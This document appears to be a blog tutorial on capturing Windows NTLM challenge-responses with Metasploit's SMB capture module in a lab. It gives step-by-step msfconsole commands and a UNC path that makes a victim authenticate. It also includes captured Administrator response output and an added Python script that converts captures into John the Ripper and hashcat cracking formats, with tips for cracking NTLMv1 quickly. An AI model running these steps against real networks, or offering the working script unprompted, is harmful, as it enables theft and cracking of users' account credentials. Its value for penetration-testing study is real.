Friday, June 22, 2012

NTLM Authentication Hijack using Metasploit


Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Search for SMB modules
Code:
msf > search smb
Step 2: Use the SMB capture auxiliary module to collect the hashes
Code:
msf > use server/capture/smb
msf auxiliary(smb) > show options
(output snipped)
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt
msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run
Note: SRVHOST must be the address clients can reach us on. The module listens on SRVHOST:SRVPORT (default 445), answers every SMB session setup with a fixed 8-byte server challenge (option CHALLENGE, default 1122334455667788) and records the client's LM/NTLM responses to PWFILE. Because the challenge never changes, NTLMv1 responses can be cracked offline with precomputed tables or with John the Ripper/hashcat; NTLMv2 responses carry a client-chosen nonce and timestamp, so they can only be brute-forced per capture. In later Metasploit releases PWFILE is replaced by CAINPWFILE and JOHNPWFILE, which write the same data in Cain & Abel and John formats.
Step 3: From the target machine, make Windows open a UNC path on our machine (for example from Start > Run or the Explorer address bar):
Code:
\\192.168.1.252\shared\xxx.jpg
Note: \shared\xxx.jpg is just a fake path (it doesn't exist). The SMB client authenticates to the server before it looks up the share, so Windows sends the logged-on user's NTLM challenge-response automatically; neither the share nor the file has to exist.
Step 4: Switch to our machine and check whether the hashes have been captured
Code:
msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Note: the LMHASH and NTHASH values are the client's 24-byte LM and NTLM responses to the module's challenge, not the hashes stored in the SAM, so they cannot be used directly for pass-the-hash and have to be cracked. Their 48-hex-character length shows this client answered with NTLMv1; "Windows 2002 Service Pack 2 2600" and "Windows 2002 5.1" are the native OS and LAN Manager strings Windows XP SP2 (build 2600, version 5.1) sends in the session setup.
Press Ctrl-C to stop the module (the responses are already written to the PWFILE).
To display the captured hashes, change to the /tmp directory and print the file:
Code:
root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt
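Once the responses are in PWFILE, the next step is cracking them. As an added example (not part of the original post, and not Metasploit's own code), the following Python script parses the module's "[*] Captured ..." status lines, tells NTLMv1 from NTLMv2 responses by their length, and rewrites each one into the line format John the Ripper (--format=netntlm / netntlmv2) and hashcat (-m 5500 / -m 5600) accept. It assumes the capture was taken with the module's default CHALLENGE of 1122334455667788; the first sample line is the one captured above, the NTLMv2 sample line is constructed for illustration.

```python
import re

# Assumption for this example: the module was left on its default CHALLENGE.
# Override this if you set CHALLENGE to something else in msfconsole.
DEFAULT_CHALLENGE = "1122334455667788"

# Matches the "[*] Captured ip:port DOMAIN\user LMHASH:... NTHASH:..." line
# printed by server/capture/smb. The trailing OS/LM strings are ignored.
CAPTURE_RE = re.compile(
    r"Captured\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>\S+)\s+"
    r"LMHASH:(?P<lm>[0-9a-fA-F]*)\s+NTHASH:(?P<nt>[0-9a-fA-F]*)"
)


def parse_capture(line):
    """Return a dict (ip, port, domain, user, lm, nt) or None if the line is not a capture."""
    m = CAPTURE_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["lm"] = rec["lm"].lower()
    rec["nt"] = rec["nt"].lower()
    return rec


def ntlm_version(rec):
    """Classify by NT response length.

    NTLMv1: a 24-byte DES-based response (48 hex chars).
    NTLMv2: a 16-byte HMAC-MD5 followed by a variable-length blob (> 48 hex chars).
    """
    n = len(rec["nt"])
    if n == 48:
        return "NTLMv1"
    if n > 48 and n % 2 == 0:
        return "NTLMv2"
    return "unknown"


def to_crack_line(rec, challenge=DEFAULT_CHALLENGE):
    """Format one record for John/hashcat.

    NTLMv1 (john netntlm, hashcat 5500):  user::domain:lmresp:ntresp:challenge
    NTLMv2 (john netntlmv2, hashcat 5600): user::domain:challenge:hmac:blob
    """
    ver = ntlm_version(rec)
    if ver == "NTLMv1":
        return f"{rec['user']}::{rec['domain']}:{rec['lm']}:{rec['nt']}:{challenge}"
    if ver == "NTLMv2":
        hmac_part, blob = rec["nt"][:32], rec["nt"][32:]
        return f"{rec['user']}::{rec['domain']}:{challenge}:{hmac_part}:{blob}"
    raise ValueError(f"cannot format response of type {ver} for {rec['user']}")


def convert_log(lines, challenge=DEFAULT_CHALLENGE):
    """Convert every capture line in a msfconsole log, skipping noise and duplicates."""
    out, seen = [], set()
    for line in lines:
        rec = parse_capture(line)
        if rec is None:
            continue
        crack = to_crack_line(rec, challenge)
        if crack not in seen:
            seen.add(crack)
            out.append(crack)
    return out


# Sample input: line 1 is the capture from the page; line 4 is a constructed
# NTLMv2-style capture (LMv2 = 16-byte HMAC + 8-byte client nonce, NTv2 = HMAC + blob).
SAMPLE_LOG = [
    "[*] Captured 192.168.1.50:1038 LON-CL1\\Administrator "
    "LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d "
    "NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 "
    "OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1",
    "[*] Server started.",
    "[*] Captured 192.168.1.50:1038 LON-CL1\\Administrator "
    "LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d "
    "NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 "
    "OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1",
    "[*] Captured 192.168.1.77:49201 CORP\\jdoe "
    "LMHASH:1f2e3d4c5b6a79880f1e2d3c4b5a69780102030405060708 "
    "NTHASH:8f2d1a4b6c9e0f13579bdf2468ace0fe0101000000000000d06a0f4a7c5fcd01"
    "010203040506070800000000020000000000000000 "
    "OS:Windows 7 Ultimate 7601 Service Pack 1 LM:Windows 7 Ultimate 6.1",
]

if __name__ == "__main__":
    for crack_line in convert_log(SAMPLE_LOG):
        print(crack_line)
```

Feed the output to john --format=netntlm (NTLMv1) or --format=netntlmv2, or to hashcat -m 5500 / -m 5600. For NTLMv1 captured with the default challenge, the first 8 bytes of the LM response depend only on the first 7 characters of the LM hash, which is what the "halflm" rainbow tables exploit; with NTLMv2 no such shortcut exists, so the strength of the password decides.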
